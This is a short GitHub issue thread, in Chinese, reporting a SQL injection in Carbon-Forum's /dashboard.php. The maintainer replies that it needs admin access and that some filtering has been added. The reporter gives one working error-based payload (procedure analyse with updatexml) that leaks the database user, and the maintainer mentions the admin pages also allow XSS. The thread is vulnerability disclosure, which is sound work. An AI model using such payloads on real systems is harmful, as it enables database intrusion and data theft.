### ISSUE TITLE
SQL Injection in /dashboard.php

### ISSUE THREAD

**Issue by RicterZ** [lincanbin/Carbon-Forum#37]
1. 设置每页显示为：`20 procedure analyse(updatexml(1,concat(0x3a,(user())),1),1);`
![](http://ww4.sinaimg.cn/large/b55b6a91gw1er62knd7tkj20fc027glo.jpg)   
2. 访问首页
![](http://ww4.sinaimg.cn/mw690/b55b6a91gw1er62kx3k5dj20g702dmxf.jpg)

**Comment by lincanbin** [comment]
这个的利用要先取得管理员权限，我等下再看看。

**Comment by lincanbin** [comment]
实际上后台对管理员是完全不设防的，甚至可以通过页面设置直接进行XSS

**Comment by lincanbin** [comment]
做了一点过滤。

**Comment by RicterZ** [comment]
_(:3」∠)_
ww
